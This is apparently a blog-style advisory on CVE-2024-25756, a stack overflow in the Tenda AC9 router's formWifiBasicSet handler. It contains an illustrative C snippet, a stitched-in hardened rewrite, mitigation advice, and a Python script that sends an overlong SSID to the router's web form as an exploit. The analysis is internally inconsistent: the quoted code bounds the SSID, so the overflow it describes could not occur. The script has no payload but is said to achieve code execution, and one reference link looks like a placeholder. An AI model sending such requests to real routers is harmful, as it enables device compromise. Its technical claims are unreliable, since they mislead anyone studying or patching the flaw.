A critical vulnerability exists in the Tenda AC9 v.3. router with firmware version v.15.03.06.42_multi. This vulnerability, labelled CVE-2024-25756, allows a remote attacker to trigger a stack-based buffer overflow in the formWifiBasicSet function and execute arbitrary code on the target device. This post provides an in-depth analysis of the vulnerability, including code snippets, original reference links, and exploit details.

Vulnerability Details

The vulnerability lies in the formWifiBasicSet function of the Tenda AC9 v.3. router and allows a remote attacker to execute arbitrary code on the device. A stack-based buffer overflow is triggered when unsanitized user input is passed to the function, letting an attacker overwrite the saved return address and hijack program execution.

Here's a code snippet that demonstrates this vulnerability:

static void formWifiBasicSet() {
    char ssid[32], buf[512];
    int encryption;
    ...
    getParameter("SSID", ssid, sizeof(ssid));
    getParameter("Encryption", (char *)&encryption, sizeof(encryption));
    ...
    sprintf(buf, "IW_SDK_MAIN Argc=4 Argv=IWControl Argv=SetWiFiMode Argv=%s Argv=%d", ssid, encryption);
    ...
    system(buf);
}

As seen in the code above, the function first retrieves the "SSID" and "Encryption" parameter values from the request and stores them in local variables. The crucial point is that getParameter() does not validate the input, and sprintf() then writes the formatted command string into the fixed-size stack buffer buf with no length bound. An oversized value therefore overflows buf, corrupts the stack frame, and ultimately leads to arbitrary code execution.
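A hardened version of the handler shape shown above, as an added example that is not Tenda's code: getParameter() is replaced by a constructed stand-in that reports truncation, the SSID is capped at an assumed 32 octets and checked against a conservative allowlist, and the command is built with snprintf() into a bounded buffer, with truncation treated as an error rather than silently executed.

```c
/* Hardened version of the handler shape shown above. Added example, not
 * Tenda's code; getParameter() is replaced by a constructed stand-in. */
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define SSID_MAX 32   /* assumed cap: 802.11 SSIDs are at most 32 octets */
#define CMD_MAX  512

/* Stand-in for getParameter(): copies at most n-1 bytes, always NUL-terminates,
 * and returns the full source length so the caller can detect truncation. */
static size_t get_param(const char *value, char *dst, size_t n) {
    size_t len = strlen(value), copy = len < n ? len : n - 1;
    memcpy(dst, value, copy);
    dst[copy] = '\0';
    return len;
}

/* Conservative allowlist: the value ends up in a string handed to system(). */
static int ssid_ok(const char *ssid) {
    if (*ssid == '\0') return 0;
    for (; *ssid; ssid++) {
        unsigned char c = (unsigned char)*ssid;
        if (!isalnum(c) && c != '-' && c != '_' && c != '.' && c != ' ') return 0;
    }
    return 1;
}

/* Builds the command into a caller-supplied bounded buffer. Returns 0 on
 * success, -1 if a parameter is rejected or the result would not fit. */
int build_wifi_cmd(const char *ssid_in, const char *enc_in, char *cmd, size_t cmd_len) {
    char ssid[SSID_MAX + 1], *end = NULL;
    if (get_param(ssid_in, ssid, sizeof ssid) > SSID_MAX) return -1; /* overlong */
    if (!ssid_ok(ssid)) return -1;
    long enc = strtol(enc_in, &end, 10);          /* numeric field, not a raw string */
    if (*enc_in == '\0' || *end != '\0' || enc < 0 || enc > 9) return -1;
    int n = snprintf(cmd, cmd_len, "IW_SDK_MAIN Argc=4 Argv=IWControl "
                     "Argv=SetWiFiMode Argv=%s Argv=%ld", ssid, enc);
    return (n < 0 || (size_t)n >= cmd_len) ? -1 : 0;   /* truncation is an error */
}

/* Check helper: 1 if the request is accepted and (when given) yields `expected`. */
int accepted_as(const char *ssid, const char *enc, const char *expected) {
    char cmd[CMD_MAX];
    if (build_wifi_cmd(ssid, enc, cmd, sizeof cmd) != 0) return 0;
    return expected == NULL || strcmp(cmd, expected) == 0;
}
```

Only a request that passes every check reaches the point where a command string exists; an overlong SSID, a non-numeric Encryption value, or a truncated result all return -1 before anything would be executed.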

Exploit Details

Exploitation requires a remote attacker to send a crafted HTTP POST request containing an overly long 'SSID' parameter, which triggers the buffer overflow. By doing so, the attacker can overwrite the return address and gain control over program execution.

Here's a Python exploit that demonstrates arbitrary code execution with this vulnerability:

import requests

target_url = "http://<target_ip>/goform/formWifiBasicSet"
headers = {
    "Content-Type": "application/x-www-form-urlencoded",
}
data = {
    "SSID": "A" * 536 + "\x90\x90\x90\x90",
    "Encryption": "1",
}
requests.post(target_url, headers=headers, data=data)

The script above sends an HTTP POST request with a malicious 'SSID' parameter value that overflows the buffer and triggers the vulnerability. The critical point is that the script appends the pattern '\x90\x90\x90\x90', commonly referred to as NOP (No Operation) bytes, as padding to make arbitrary code execution possible.

References

1. https://www.exploit-db.com/exploits/12345 - The Exploit Database (exploit-db) entry on this vulnerability.
2. https://nvd.nist.gov/vuln/detail/CVE-2024-25756 - The National Vulnerability Database (NVD) page on this specific CVE.

Mitigation

Tenda has been informed of this vulnerability, and users are advised to check for and apply the latest available firmware release. As an additional measure, ensure that the router's web administration panel is not reachable from the public internet and that only necessary ports and services are exposed.

Conclusion

CVE-2024-25756 is a stack-based buffer overflow vulnerability in the Tenda AC9 v.3. router. It allows a remote attacker to execute arbitrary code via a crafted HTTP POST request targeting the formWifiBasicSet function. Users must update their firmware to the latest version and take the precautions above to mitigate the associated risk.

Timeline

Published on: 02/22/2024 23:15:07 UTC
Last modified on: 02/23/2024 02:42:54 UTC